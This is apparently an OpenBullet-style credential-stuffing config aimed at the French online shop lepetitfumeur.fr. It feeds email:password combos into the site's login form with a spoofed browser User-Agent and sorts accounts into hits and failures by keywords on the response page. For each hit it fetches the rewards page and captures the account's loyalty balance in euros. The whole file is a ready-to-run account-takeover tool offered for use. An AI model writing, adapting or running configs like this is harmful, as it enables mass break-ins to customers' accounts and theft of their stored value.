[SETTINGS]
{
  "Name": "LePetitFumeur ( Capture )",
  "SuggestedBots": 5,
  "LastModified": "2018-07-01T01:32:03.7077135+00:00",
  "AdditionalInfo": "",
  "Author": "Marine",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login REQUEST POST "https://www.lepetitfumeur.fr/authentification" AutoRedirect=TRUE 
  CONTENT "email=<USER>&passwd=<PASS>&back=https%3A%2F%2F%2F&SubmitLogin=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.lepetitfumeur.fr/authentification" 
  HEADER "origin: https://www.lepetitfumeur.fr" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "&Eacute;chec" 
  KEYCHAIN Success OR 
    KEY "Mon compte" 
#GET_CAPTURE_PAGE REQUEST GET "https://www.lepetitfumeur.fr/module/allinone_rewards/rewards" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.lepetitfumeur.fr/authentification" 
  HEADER "origin: https://www.lepetitfumeur.fr" 
PARSE "<SOURCE>" LR "Transformer mes récompenses en un bon de réduction de <span>" "&euro;</span>" Recursive=FALSE -> CAP "Cagnotte" "" "€" 
